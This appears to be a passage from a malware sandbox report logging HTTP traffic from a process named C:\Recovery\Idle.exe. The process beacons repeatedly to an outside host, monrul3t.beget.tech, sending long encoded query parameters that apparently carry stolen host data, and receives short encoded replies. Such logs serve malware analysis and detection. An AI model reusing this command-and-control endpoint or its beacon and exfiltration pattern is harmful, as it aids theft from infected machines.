                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.4536455.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:07:39.948144913 CET2948OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaFRlT2kEROZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:40.713232040 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.4536465.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:07:45.729319096 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaJpXT2sGROZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:07:46.607558012 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.4536475.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:07:51.620148897 CET2948OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWajRlT2kEVOZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:52.627716064 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.4536655.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:07:57.654767036 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaZpXT20ERNZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:07:58.390382051 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.4537055.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:03.401104927 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaFpWT2kFRNZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:04.164170980 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.4537425.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:09.182076931 CET2921OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfiADWmlWWE5kNnRVT2UFRNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFROxmU65ENNpXT6FkaO1mTy00dRRUTzk [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:08:09.938411951 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.4537785.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:14.947891951 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaRRVT2smaNZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:15.685311079 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            12192.168.2.4538165.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:20.748509884 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaRRUT2kEROZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:21.459779024 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
